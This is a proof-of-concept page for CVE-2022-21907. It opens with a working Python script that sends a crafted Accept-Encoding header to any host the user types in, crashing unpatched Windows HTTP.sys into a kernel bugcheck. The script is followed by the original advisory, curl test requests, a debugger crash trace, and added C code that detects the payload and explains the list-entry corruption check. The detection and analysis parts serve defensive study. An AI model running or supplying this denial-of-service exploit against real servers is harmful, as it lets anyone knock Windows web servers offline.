#!/usr/bin/env python3
# Author @nu11secur1ty
# CVE-2022-21907
from colorama import init, Fore, Back, Style
init(convert=True)
import requests
import time

print(Fore.RED + "Please input your host...\n")
print(Style.RESET_ALL)
print(Fore.YELLOW)
host = input()
print(Style.RESET_ALL)
print(Fore.BLUE + "Sending an especially malicious crafted packet, please wait...")
print(Style.RESET_ALL)
time.sleep(17)
print(Fore.GREEN)

# The PoC :)
# One GET whose Accept-Encoding value is a list of long made-up coding names
# followed by a "*" wildcard and two empty list elements. On an unpatched
# HTTP.sys the header is parsed in UlpParseAcceptEncoding and the request ends
# in the bugcheck recorded in the advisory below. The backslash-continued
# lines form a single string.
try:
    poc = requests.get(f'http://{host}/', timeout=10, headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\
BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
****************************stupiD, *, ,',})
    # Not necessary :)
    print(poc, "\n")
except requests.exceptions.RequestException as err:
    # A target that bugchecked never answers: a timeout or a reset here is the expected outcome.
    print("No response from target:", err)
print(Style.RESET_ALL)

---- Original Advisory ----

## Title: HTTP.sys buffer overflow denial of service
## Author: nu11secur1ty
## Date: 01.12.2022
## Vendor: https://docs.microsoft.com/
## Software: https://docs.microsoft.com/en-us/aspnet/core/fundamentals/servers/httpsys?view=aspnetcore-6.0
## CVE-2022-21907

## Description:

NOTE: After a couple of hours of tests and experiments, no vulnerability showed up once we installed the IIS packages on these Windows platforms; they are fine and everything is patched. Windows Server 2019 and Windows 10 version 1809 (2018) are not vulnerable by default, but on Windows 10 version 2004 (2020) the HTTP Protocol Stack (HTTP.sys) is vulnerable to a memory-corruption denial of service: the kernel bugchecks and the system restarts. An attacker triggers it by sending a maliciously crafted Accept-Encoding header to the system's HTTP server, which is critical for that system; the header value is not correctly sanitized.

Two caveats for anyone reading the bugcheck below. The crash is a KERNEL_SECURITY_CHECK_FAILURE (0x139) with Arg1 = 3, the fast-fail code the kernel raises when a LIST_ENTRY fails its unlink check, here inside HTTP!UlFreeUnknownCodingList while the list of unrecognised codings is being freed; the 0xc0000409 status that !analyze prints is the generic value reported for every __fastfail and is not by itself evidence of a stack buffer overrun, so "list-entry corruption" describes the defect more precisely than "buffer overflow". And the reason Windows Server 2019 and Windows 10 version 1809 are unaffected by default comes from Microsoft's advisory for CVE-2022-21907: those builds are only vulnerable if HTTP trailer support has been enabled through the EnableTrailerSupport registry value under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters, and deleting that value is the documented workaround.
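To make the header-level difference concrete, here is an added example, written for this page and not part of nu11secur1ty's PoC or advisory, that parses an Accept-Encoding value the way a request-inspection or WAF rule would: it splits the RFC 7230 comma list, strips q-weights, classifies each element as a registered coding, the * wildcard, an empty element or an unknown name, and checks the RFC token character set. Run over the value the PoC sends and the value the connection tests below use, it shows what separates them: both carry unregistered names, but only the PoC value has tokens dozens of bytes long plus a wildcard and empty elements. The registered-coding subset and the length and count thresholds are this example's assumptions, not values taken from the advisory.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Accept-Encoding value sent by the PoC script at the top of this page: its
   five backslash-continued lines joined into one string, exactly as Python does. */
static const char POC_HEADER[] =
    "AAAAAAAAAAAAAAAAAAAAAAAA,"
    "BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,"
    "RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,"
    "TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,"
    "OOOAOAOOOAOOAOOOAOOOAOOOAOO,"
    "****************************stupiD, *, ,";

/* Value used by the advisory's connection tests; the host answered 404 and stayed up. */
static const char BENIGN_HEADER[] = "pwn, pwned, package";

/* IANA-registered content codings a server is likely to implement. Any other name is an
   "unknown coding" (compare HTTP!UlFreeUnknownCodingList in the stack trace). This subset
   is an assumption of the example: extend it to what your server advertises. */
static const char *const KNOWN_CODINGS[] = {
    "identity", "gzip", "x-gzip", "deflate", "compress", "x-compress", "br", "zstd", NULL
};

/* Assumed thresholds: registered names are at most a dozen bytes, browsers send a handful. */
#define MAX_SANE_CODING_LEN 32
#define MAX_SANE_ELEMENTS   16

struct ae_summary {
    int total;      /* list elements, empty ones included */
    int empty;      /* empty elements, e.g. the ", ," at the end of the PoC value */
    int wildcard;   /* "*" elements */
    int unknown;    /* non-empty names not in KNOWN_CODINGS */
    int bad_token;  /* names containing a byte outside the RFC 7230 tchar set */
    size_t max_len; /* longest name seen */
};

/* tchar = ALPHA / DIGIT / the listed punctuation (RFC 7230 section 3.2.6). */
static bool is_tchar(unsigned char c) {
    return isalnum(c) || (c != '\0' && strchr("!#$%&'*+-.^_`|~", c) != NULL);
}

static bool coding_is_known(const char *name, size_t len) {
    for (const char *const *k = KNOWN_CODINGS; *k != NULL; ++k) {
        if (strlen(*k) != len) continue;
        size_t i = 0;
        while (i < len && tolower((unsigned char)name[i]) == tolower((unsigned char)(*k)[i])) i++;
        if (i == len) return true;   /* coding names are case-insensitive */
    }
    return false;
}

struct ae_summary summarize_accept_encoding(const char *hdr) {
    struct ae_summary s = {0, 0, 0, 0, 0, 0};
    const char *p = hdr;
    for (;;) {
        const char *comma = strchr(p, ',');
        const char *b = p;
        const char *e = comma ? comma : p + strlen(p);
        while (b < e && (*b == ' ' || *b == '\t')) b++;        /* trim optional whitespace */
        while (e > b && (e[-1] == ' ' || e[-1] == '\t')) e--;
        const char *semi = memchr(b, ';', (size_t)(e - b));      /* drop a ";q=..." weight */
        if (semi != NULL) {
            e = semi;
            while (e > b && (e[-1] == ' ' || e[-1] == '\t')) e--;
        }
        size_t n = (size_t)(e - b);
        s.total++;
        if (n == 0) {
            s.empty++;
        } else if (n == 1 && *b == '*') {
            s.wildcard++;
        } else {
            bool token_ok = true;
            for (const char *c = b; c < e; ++c)
                if (!is_tchar((unsigned char)*c)) { token_ok = false; break; }
            if (!token_ok) s.bad_token++;
            if (!coding_is_known(b, n)) s.unknown++;
            if (n > s.max_len) s.max_len = n;
        }
        if (comma == NULL) break;
        p = comma + 1;
    }
    return s;
}

/* Rule a request filter in front of HTTP.sys could apply. */
bool accept_encoding_looks_hostile(const char *hdr) {
    struct ae_summary s = summarize_accept_encoding(hdr);
    return s.bad_token > 0 || s.max_len > MAX_SANE_CODING_LEN || s.total > MAX_SANE_ELEMENTS;
}

static void report(const char *label, const char *hdr) {
    struct ae_summary s = summarize_accept_encoding(hdr);
    printf("%-7s elements=%d empty=%d wildcard=%d unknown=%d bad_token=%d max_len=%zu hostile=%s\n",
           label, s.total, s.empty, s.wildcard, s.unknown, s.bad_token, s.max_len,
           accept_encoding_looks_hostile(hdr) ? "yes" : "no");
}

int main(void) {
    report("browser", "gzip, deflate, br;q=0.9");
    report("benign", BENIGN_HEADER);
    report("poc", POC_HEADER);
    return 0;
}
```

The PoC value parses as nine elements: six unknown names (the longest 89 bytes), one wildcard and two empty elements, with every byte inside the token character set, so a filter keyed on forbidden characters alone would pass it; the benign test value has three unknown names and nothing else. Because the advisory does not establish which of the PoC's features is the actual trigger, the rule above blocks on length and element count rather than on any single feature.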
Status: CRITICAL

## Simple test connection before debugging

Before sending the PoC, confirm that the target answers normally when the Accept-Encoding list is harmless. Each request below gets the standard IIS 404 page back, so the host is up and has parsed the header without crashing; note that pwn, pwned and package are themselves unregistered coding names, so unknown names on their own did not bring this host down.

```cmd
curl "http://192.168.1.8/201" -H "Accept-Encoding: pwn, pwned, package"
```

- Output:

```cmd
404 - File or directory not found.

404 - File or directory not found.

The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.

```

## 302

```cmd
curl "http://192.168.1.8/302" -H "Accept-Encoding: pwn, pwned, package"
```

- Output:

```cmd
404 - File or directory not found.

404 - File or directory not found.

The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.

```

## 404

```cmd
curl "http://192.168.1.8/404" -H "Accept-Encoding: pwn, pwned, package"
```

- Output:

```cmd
404 - File or directory not found.

404 - File or directory not found.

The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.

```

## Bugcheck:

```cmd
1: kd> kp
Child-SP          RetAddr           Call Site
ffffa102`87993158 fffff806`50404929 nt!KeBugCheckEx
ffffa102`87993160 fffff806`50404d50 nt!KiBugCheckDispatch+0x69
ffffa102`879932a0 fffff806`504030e3 nt!KiFastFailDispatch+0xd0
ffffa102`87993480 fffff806`4f33f537 nt!KiRaiseSecurityCheckFailure+0x323
ffffa102`87993610 fffff806`4f2f6ac5 HTTP!UlFreeUnknownCodingList+0x63
ffffa102`87993640 fffff806`4f2cd191 HTTP!UlpParseAcceptEncoding+0x298f5
ffffa102`87993730 fffff806`4f2a9368 HTTP!UlAcceptEncodingHeaderHandler+0x51
ffffa102`87993780 fffff806`4f2a8a47 HTTP!UlParseHeader+0x218
ffffa102`87993880 fffff806`4f204c5f HTTP!UlParseHttp+0xac7
ffffa102`879939e0 fffff806`4f20490a HTTP!UlpParseNextRequest+0x1ff
ffffa102`87993ae0 fffff806`4f2a4852 HTTP!UlpHandleRequest+0x1aa
ffffa102`87993b80 fffff806`5035b715 HTTP!UlpThreadPoolWorker+0x112
ffffa102`87993c10 fffff806`503fa078 nt!PspSystemThreadStartup+0x55
ffffa102`87993c60 00000000`00000000 nt!KiStartSystemThread+0x28

1: kd> !analyze
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure.  The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: ffffa10287993480, Address of the trap frame for the exception that caused the bugcheck
Arg3: ffffa102879933d8, Address of the exception record for the exception that caused the bugcheck
Arg4: 0000000000000000, Reserved

Debugging Details:
------------------

*** WARNING: Unable to verify timestamp for win32k.sys

BUGCHECK_CODE:  139
BUGCHECK_P1: 3
BUGCHECK_P2: ffffa10287993480
BUGCHECK_P3: ffffa102879933d8
BUGCHECK_P4: 0
PROCESS_NAME:  System
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
SYMBOL_NAME:  HTTP!UlFreeUnknownCodingList+63
MODULE_NAME: HTTP
IMAGE_NAME:  HTTP.sys
FAILURE_BUCKET_ID:  0x139_3_CORRUPT_LIST_ENTRY_HTTP!UlFreeUnknownCodingList
FAILURE_ID_HASH:  {1b194f54-2d0b-e3a8-62e2-afded08822bd}
Followup:     MachineOwner
---------
```

## Reproduce: [href](https://github.com/nu11secur1ty/Windows10Exploits/edit/master/2022/CVE-2022-21907)

## Proof and Exploit: [href](https://streamable.com/fbojva)
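What Arg1 = 3 in the bugcheck above means, as an added example that is not from the advisory: the kernel's RemoveEntryList (wdm.h) verifies Flink->Blink and Blink->Flink before it unlinks an entry and, on a mismatch, raises __fastfail(FAST_FAIL_CORRUPT_LIST_ENTRY), the code 3 that KiRaiseSecurityCheckFailure turns into bugcheck 0x139 with the "double remove" description. The user-mode C below rebuilds that list type, unlinks the same entry twice with and without the check, and shows why the check exists: without it, a second unlink through stale Flink/Blink pointers writes heap pointers into whatever now occupies the neighbour's memory and leaves the live list pointing at freed storage. The coding_node type and the gzip/bogus/br names are illustrative assumptions; nothing here reproduces HTTP.sys's real structures.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Fast-fail code the kernel passes when RemoveEntryList's neighbour check fails;
   it is the "3" in Arg1 / BUGCHECK_P1 of the 0x139 bugcheck above (winnt.h name). */
#define FAST_FAIL_CORRUPT_LIST_ENTRY 3

/* Same shape as the kernel's LIST_ENTRY: circular, doubly linked, sentinel head. */
typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY;

static void InitializeListHead(PLIST_ENTRY head) { head->Flink = head->Blink = head; }

static void InsertTailList(PLIST_ENTRY head, PLIST_ENTRY entry) {
    PLIST_ENTRY last = head->Blink;
    entry->Flink = head;
    entry->Blink = last;
    last->Flink = entry;
    head->Blink = entry;
}

/* Historic unlink: trusts whatever Flink/Blink the entry carries and writes through both. */
static void RemoveEntryListUnchecked(PLIST_ENTRY entry) {
    entry->Blink->Flink = entry->Flink;
    entry->Flink->Blink = entry->Blink;
}

/* Unlink with the consistency check modern wdm.h performs before writing. In the kernel a
   failure calls __fastfail(FAST_FAIL_CORRUPT_LIST_ENTRY) and the machine bugchecks; here
   the code is returned instead so the outcome can be inspected. */
static int RemoveEntryListChecked(PLIST_ENTRY entry) {
    PLIST_ENTRY next = entry->Flink, prev = entry->Blink;
    if (next->Blink != entry || prev->Flink != entry)
        return FAST_FAIL_CORRUPT_LIST_ENTRY;
    prev->Flink = next;
    next->Blink = prev;
    return 0;
}

/* Illustrative stand-in for the per-request objects HTTP.sys links together. */
struct coding_node {
    LIST_ENTRY Link;
    char Name[16];
};

/* head <-> a("gzip") <-> b("bogus") <-> c("br") */
static void build_list(PLIST_ENTRY head, struct coding_node *a, struct coding_node *b, struct coding_node *c) {
    InitializeListHead(head);
    memset(a, 0, sizeof *a); memset(b, 0, sizeof *b); memset(c, 0, sizeof *c);
    strcpy(a->Name, "gzip"); strcpy(b->Name, "bogus"); strcpy(c->Name, "br");
    InsertTailList(head, &a->Link);
    InsertTailList(head, &b->Link);
    InsertTailList(head, &c->Link);
}

/* Removing b twice: the first unlink is clean; the second trips the check because b's
   stale pointers still name a and c while a->Flink is now c, not b. */
int double_remove_fastfail_code(void) {
    LIST_ENTRY head; struct coding_node a, b, c;
    build_list(&head, &a, &b, &c);
    if (RemoveEntryListChecked(&b.Link) != 0) return -1;   /* list was consistent, must succeed */
    return RemoveEntryListChecked(&b.Link);                 /* expected: FAST_FAIL_CORRUPT_LIST_ENTRY */
}

/* Without the check the same mistake becomes a blind write: b is unlinked, its neighbour a is
   unlinked and its storage reused by an unrelated allocation, then the stale unlink of b writes
   &c into that reused memory and makes the still-live c point back into freed storage. */
bool unchecked_double_remove_corrupts(void) {
    LIST_ENTRY head; struct coding_node a, b, c;
    build_list(&head, &a, &b, &c);
    RemoveEntryListUnchecked(&b.Link);      /* b "freed", still holds Flink=&c, Blink=&a */
    RemoveEntryListUnchecked(&a.Link);      /* a "freed" too; the list is now head <-> c */
    memset(&a, 0x41, sizeof a);             /* a's storage handed out to a new allocation */
    RemoveEntryListUnchecked(&b.Link);      /* double remove through stale links */
    return a.Link.Flink == &c.Link          /* the new allocation now contains a list pointer */
        && c.Link.Blink == &a.Link;         /* and the live list points into freed memory */
}

/* The same sequence with the check in place is caught before any write happens. */
int checked_double_remove_after_reuse(void) {
    LIST_ENTRY head; struct coding_node a, b, c;
    build_list(&head, &a, &b, &c);
    if (RemoveEntryListChecked(&b.Link) != 0) return -1;
    if (RemoveEntryListChecked(&a.Link) != 0) return -1;
    memset(&a, 0x41, sizeof a);
    return RemoveEntryListChecked(&b.Link); /* c.Blink is head, not b: FAST_FAIL_CORRUPT_LIST_ENTRY */
}

int main(void) {
    printf("checked unlink, second remove of the same entry: fast-fail code %d\n", double_remove_fastfail_code());
    printf("unchecked unlink corrupted reused memory: %s\n", unchecked_double_remove_corrupts() ? "yes" : "no");
    printf("checked unlink after reuse: fast-fail code %d\n", checked_double_remove_after_reuse());
    return 0;
}
```

The bugcheck is therefore the mitigation working as designed: the write primitive that an unchecked unlink would have handed to the attacker is converted into an immediate fast-fail, which is why the outcome on the affected build is a reboot rather than code execution, and why a missing or bypassable check in the same path would be a far more serious bug.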